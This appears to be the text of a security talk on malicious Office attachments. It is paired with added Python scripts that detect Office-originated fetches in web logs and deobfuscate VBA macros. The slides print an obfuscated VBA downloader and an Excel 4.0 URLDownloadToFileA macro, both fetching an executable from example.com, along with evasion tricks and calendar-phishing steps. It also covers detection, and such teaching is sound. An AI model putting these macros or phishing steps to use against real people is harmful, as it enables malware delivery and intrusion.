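The User-Agent strings and request sequences on the image-injection and remote-template slides are visible on any proxy or web server that sits in the path, and the recon slide's "mass downloads of externally hosted files" is visible in the same logs. The script below is an added example, not from the talk or its toolkits: it parses Combined Log Format lines, reports every request whose User-Agent carries one of the Office markers listed on the slides, the clients issuing the HEAD/OPTIONS/PROPFIND template probes, and clients that fetch an unusual number of distinct documents. The log lines, the document extension list and the download threshold are constructed assumptions.

```python
"""Access-log triage for Office-originated fetches (added example, not from the talk)."""
import re
from collections import defaultdict

# Substrings of the User-Agent values listed on slides 10 and 14.
OFFICE_UA_MARKERS = (
    "ms-office",                              # IncludePicture / template GET
    "Microsoft Office Word",
    "Microsoft Office Existence Discovery",
    "Microsoft Office Protocol Discovery",
    "Microsoft-WebDAV-MiniRedir",
)
PROBE_METHODS = {"HEAD", "OPTIONS", "PROPFIND"}
# Assumption: what counts as a "document" for the mass-download check.
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".zip")

# Combined Log Format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_office_ua(ua):
    """True when the User-Agent contains any Office marker from the slides."""
    return any(marker in ua for marker in OFFICE_UA_MARKERS)

def triage(lines, mass_download_threshold=20):
    """Return Office-UA requests, template-probing clients and mass downloaders."""
    office_requests = []
    template_probes = set()
    docs_per_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_office_ua(rec["ua"]):
            office_requests.append((rec["ip"], rec["method"], rec["path"], rec["ua"]))
            if rec["method"] in PROBE_METHODS:
                template_probes.add(rec["ip"])
        if rec["method"] == "GET" and rec["path"].lower().endswith(DOCUMENT_EXTS):
            docs_per_ip[rec["ip"]].add(rec["path"])
    mass = {ip: len(paths) for ip, paths in docs_per_ip.items()
            if len(paths) >= mass_download_threshold}
    return {"office_requests": office_requests,
            "template_probes": template_probes,
            "mass_downloaders": mass}

# Constructed sample log: one client replays the slide-14 template probe
# sequence after an IncludePicture GET, another pulls three documents.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2019:13:55:36 -0700] "GET /images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; ms-office; MSOffice 16)"
203.0.113.10 - - [10/Oct/2019:13:55:37 -0700] "OPTIONS /payload-dir/ HTTP/1.1" 200 0 "-" "Microsoft Office Word 2014"
203.0.113.10 - - [10/Oct/2019:13:55:37 -0700] "HEAD /payload-dir/Template.dotm HTTP/1.1" 200 0 "-" "Microsoft Office Existence Discovery"
203.0.113.10 - - [10/Oct/2019:13:55:38 -0700] "PROPFIND /payload-dir/ HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0.17134"
198.51.100.7 - - [10/Oct/2019:14:01:02 -0700] "GET /docs/handbook.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/69.0"
198.51.100.7 - - [10/Oct/2019:14:01:03 -0700] "GET /docs/policy.docx HTTP/1.1" 200 40100 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/69.0"
198.51.100.7 - - [10/Oct/2019:14:01:03 -0700] "GET /docs/org-chart.pptx HTTP/1.1" 200 38000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/69.0"
192.0.2.44 - - [10/Oct/2019:14:05:00 -0700] "GET /docs/handbook.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/69.0"
"""

if __name__ == "__main__":
    report = triage(SAMPLE_LOG.splitlines(), mass_download_threshold=3)
    for key, value in report.items():
        print(key, value)
```

One caveat the slides themselves make visible: the User-Agent strings shown for the Excel 4.0 URLDownloadToFileA downloader look like plain Internet Explorer and carry no "ms-office" marker, so that path is only caught by the endpoint side (process telemetry), not by this log check.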
Malicious Attachments: VBA Macros
Classic Initial Access technique that has gone through many iterations
● WMI execution
● PowerShell download cradles
● Hiding variables in document properties
● Hiding variables in document XML
● Hiding variables in images/alternative text
● Reverse strings and replace characters
● Use words relevant to business as variables
● Stage the payload
● Execute outside of Office ancestry
Relevant Threat Actors: APT12, APT19, APT28, FIN4...
MITRE ATT&CK IDs: T1193, T1064
References: VBA Stomping - Advanced Malware Techniques (DerbyCon 2018)

Sub Auto_Open(): downloadFile : XSL : PrivacyMode : End Sub

Function PrivacyMode()
    ActiveSheet.Shapes(1).Visible = msoFalse
End Function

Function downloadFile()
    ' Replacement characters
    accounting = "#$"
    ' stage URL https://example.com/payload.jpg
    finance = "gp#$j.d#$aoly#$ap/m#$oc.e#$lpmax#$e//#$:sp#$tth"
    ' where to save the downloaded file to - C:\Users\<user>\Desktop\test.exe
    path = Environ("userprofile") & Application.PathSeparator & _
        StrReverse(Replace("ex#$e.ts#$et\po#$tks#$eD", accounting, ""))
    ' MSXML2.ServerXMLHTTP object
    Set Tuesday = CreateObject(StrReverse(Replace("PTTHLMXre#$vreS.2LMXSM", accounting, "")))
    ' Creating and sending GET request for payload
    Tuesday.Open "GET", finance, False
    Tuesday.send
    If Tuesday.Status = 200 Then
        ' ADODB.Stream object
        Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "")))
        January.Open
        January.Type = 1
        January.Write Tuesday.ResponseBody
        January.Position = 0
        January.SaveToFile path
        January.Close
    End If
End Function

' Execution via XSL
Function XSL()
    …SNIP…
End Function
Malicious Attachments: Excel 4.0/VBA Hybrid
Use old version of Excel macros to execute code that bypasses current detection tools
● Stan Hegt and team showed how to execute shellcode directly through Windows APIs and Excel 4.0 macros at DerbyCon
● I wanted to get away from two things with this method
○ Spawning as a child process of Excel
○ Giving away C2 infrastructure if the doc is discovered
● Came up with my own attack flow with an Excel 4.0 downloader and VBA execution
Relevant Threat Actor: TA505
References: The MS Office Magic Show (DerbyCon 2018)

Sample Excel 4.0 Macro:
● Insert... -> MS Excel 4.0 Macro
● Set Define Name for Cell A1 to “Auto_Open”
=REGISTER("Urlmon","URLDownloadToFileA","JJCCJJ","URLD",,1,9)
=URLD(,"https://example.com/logo.jpg","C:\temp\artifact.exe",0,)
=WAIT(NOW() + "00:00:05")
'VBA Execution Function
=Taxes()
=HALT()

User Agent for GET Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; wbx 1.0.0; Zoom 3.6.0)
● MS Word Version 14.0.4760.1000.20344: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Malicious Attachments
Points of discovery:
● Documents with outbound network connectivity
● VBA scripts run from documents
● Execution as child process of an Office product
● Old format versions of Office documents (<Office 2003)
● Calls to misused objects and functions in Office VBA macros:
○ C08AFD90-F2A1-11D1-8455-00A0C91F3880
○ Microsoft.XMLDOM
○ Schedule.Service
○ ADODB.Stream
○ MSXML2.ServerXMLHTTP
○ ActiveSheet.Shapes(#).Visible = msoFalse
○ StrReverse
○ Replace
Incident Response tip:
● Sandbox payloads on a system representative of your domain without outbound connectivity (environmental keying bypasses this)
● oledump.py to scrape VBA and Excel 4.0 (plugin_biff.py) macro content and view code
Relevant Threat Actor: TA505
Tool reference: https://github.com/DidierStevens/DidierStevensSuite
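Once oledump.py has scraped the macro text, the indicator list above can be checked mechanically. The catch, shown on the VBA slide, is that the ProgIDs never appear literally: they are hidden as StrReverse(Replace("...", sep, "")) constants, so a plain substring search misses them. The script below is an added example, not part of the talk or of oledump: it recovers those constants (including the case where the separator lives in a variable assigned earlier) and then scores the macro against the slide's indicators plus the Excel 4.0 slide's URLDownloadToFileA pattern. The sample macro is constructed for this example in the same style as the slide's.

```python
"""Static macro triage against the slide's indicators (added example, not from the talk)."""
import re

# Indicators from the "Points of discovery" slide, plus the Excel 4.0
# downloader API from the hybrid slide; matched case-insensitively.
INDICATORS = (
    "C08AFD90-F2A1-11D1-8455-00A0C91F3880",
    "Microsoft.XMLDOM",
    "Schedule.Service",
    "ADODB.Stream",
    "MSXML2.ServerXMLHTTP",
    "Shapes(",              # ActiveSheet.Shapes(#).Visible = msoFalse
    "msoFalse",
    "StrReverse",
    "Replace",
    "URLDownloadToFileA",
)

# StrReverse(Replace("<literal>", <sep>, "")) where <sep> is a quoted
# literal or the name of a variable assigned a string earlier in the macro.
STRREV_RE = re.compile(
    r'StrReverse\s*\(\s*Replace\s*\(\s*"([^"]*)"\s*,\s*([^,]+?)\s*,\s*""\s*\)\s*\)',
    re.IGNORECASE,
)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.MULTILINE)

def string_constants(src):
    """Map of variable name -> string literal for simple `name = "..."` lines."""
    return {name: val for name, val in ASSIGN_RE.findall(src)}

def deobfuscate(src):
    """Return the plaintext of every StrReverse(Replace(...)) constant in src."""
    consts = string_constants(src)
    out = []
    for literal, sep in STRREV_RE.findall(src):
        sep = sep.strip()
        if sep.startswith('"') and sep.endswith('"'):
            sep = sep[1:-1]               # inline separator literal
        else:
            sep = consts.get(sep, sep)    # separator held in a variable
        out.append(literal.replace(sep, "")[::-1])
    return out

def scan(src):
    """Score macro text: indicators found in the raw source or in recovered strings."""
    hidden = deobfuscate(src)
    haystack = (src + "\n" + "\n".join(hidden)).lower()
    hits = sorted({ind for ind in INDICATORS if ind.lower() in haystack})
    return {"hits": hits, "hidden_strings": hidden, "score": len(hits)}

# Constructed sample in the style of the slide's macro: the ProgIDs are only
# present in reversed, separator-stuffed form.
SAMPLE_MACRO = '''\
Function PrivacyMode()
    ActiveSheet.Shapes(1).Visible = msoFalse
End Function
Function downloadFile()
    accounting = "#$"
    Set Tuesday = CreateObject(StrReverse(Replace("PTTHLMXre#$vreS.2LMXSM", accounting, "")))
    Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "")))
End Function
'''

if __name__ == "__main__":
    result = scan(SAMPLE_MACRO)
    print("recovered:", result["hidden_strings"])
    print("indicators:", result["hits"], "score:", result["score"])
```

Pipe the VBA stream that oledump.py -s N -v extracts into scan() and the recovered strings are usually enough to decide whether the document deserves the offline, domain-representative sandbox the slide recommends; anything the regex cannot resolve (separators built at runtime, constants from document properties) still surfaces through the StrReverse and Replace hits themselves.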
Malicious Attachments: Calendar Phishing
Make a meeting invite notification pop up posing as an important meeting, with a link to presentation material or conference software to view the meeting
● Create a calendar event and include the victim as an attendee
● Attach a malicious link or document to the invite
● Opt out of sending an invite email
● Shells?
Points of discovery:
● Meetings originating from non-trusted domain email addresses
● Meetings that appear without an emailed meeting invite
Incident Response tip:
● Get the business to disable automatic adding of invitations to the calendar
Relevant Threat Actor: Scammers, me, Future Threat Actors probably
Thank you for playing!
Thanks for your time and attention. Questions?